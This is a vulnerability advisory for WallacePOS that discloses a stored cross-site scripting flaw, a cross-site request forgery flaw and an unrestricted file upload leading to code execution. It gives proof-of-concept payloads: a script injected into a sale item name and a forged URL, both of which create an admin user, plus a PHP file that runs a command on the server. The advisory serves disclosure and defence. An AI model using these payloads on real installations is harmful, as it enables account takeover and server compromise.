WallacePOS Multiple Vulnerabilities

CVE-2019-3958: /api/sales/add Sales Item Name Authenticated Persistent Cross-site Scripting

A persistent cross-site scripting vulnerability was found in the sale item name of a till transaction on the /api/sales/add endpoint. This vulnerability requires user interaction to be exploited successfully. This vulnerability can grant an attacker with normal user privileges the ability to perform any action authorized to an administrator.

This vulnerability is caused by the lack of input validation on the sales transaction name at the /api/sales/add endpoint. Unchecked input is stored in the application database on the server and subsequently sent to clients when they request information about a sale. This field also is displayed, unsanitized, in application administrator reports.

Proof of Concept

1. Log into WallacePOS as a normal "staff" user using the application landing page at https:<your server>/.
2. Click "Till" and then "Add". In the Name column add the following script (make sure you replace 127.0.0.1 with your server IP):

   • <script>alert("Adding joe."); $.get("https://127.0.0.1/api/users/add?data=%7B%22username%22%3A%22joe%22%2C%22pass%22%3A%22022c22c21fc47dda38e12228c1e69fbc6a9e18d9d3478927091ca4145d641862%22%2C%22admin%22%3A1%7D");</script>

3. Add a unit price and then click "Process".
4. Complete the sale by clicking "cash" and then "Complete".
5. Choose "Cancel" when asked to print a receipt.
6. Log out of the application and log back in as a WallacePOS admin user.
7. Click "Sales", find the transaction you just added and then click "View".
8. Notice that a JavaScript alert is displayed with the text "xss".

CVE-2019-3959: Cross-site Request Forgery

A cross-site request forgery (XSRF) vulnerability in WallacePOS 1.4.3 allows remote attackers to perform actions with the permissions of a victim user, provided the victim user has an active session and is induced to trigger the malicious request.

For instance, an attacker could convince a victim WallacePOS user into clicking a link that, when clicked, causes a new user to be added.

This vulnerability is caused because browsers automatically include session cookies when performing requests. Therefore, if the victim user is authenticated to the site, the site cannot distinguish between the forged or legitimate request sent by the victim.

Please note that this vulnerability can be combined with the cross-site scripting vulnerability to automatically perform sensitive application actions.

Proof of Concept

(Note that the IP address must be replaced with the IP of the WallacePOS instance.)

The following PoC URL will create a user named "joe" with a password of "schmoe". If this link is sent to a victim user with sufficient privileges, and it is clicked, then the user "joe" will be created.

https://127.0.0.1/api/users/add?data=%7B%22username%22%3A%22joe%22%2C%22pass%22%3A%22022c22c21fc47dda38e12228c1e69fbc6a9e18d9d3478927091ca4145d641862%22%2C%22admin%22%3A1%7D

CVE-2019-3960: Authenticated Unrestricted File Upload RCE

An unrestricted file upload vulnerability in WallacePOS allows a remote authenticated admin user to execute arbitrary PHP code on the server in the context of the web server process. The authenticated admin user can browse to https:/admin/#!possettings, select the "Browser/Email Logo" upload widget and upload any file type to the server. It is possible upload a PHP reverse shell and access the host as www-data given a default Apache2 server configuration.

Proof of Concept

1. On your local machine, create a file named "whoami.php". Save the file with the following contents:

   • <?php echo exec('whoami'); ?>

2. Log into WallacePOS as an administrator.
3. Visit the "Settings" page. Then browse to "POS Settings".
4. For the "Browser/Email Logo" choose your whoami.php file. Click "Save" at the bottom.
5. In the browser, visit https://127.0.0.1/docs/whoami.php. (Be sure to replace the IP address accordingly.)
6. The result will likely be 'www-data' (whatever user the web server is running as).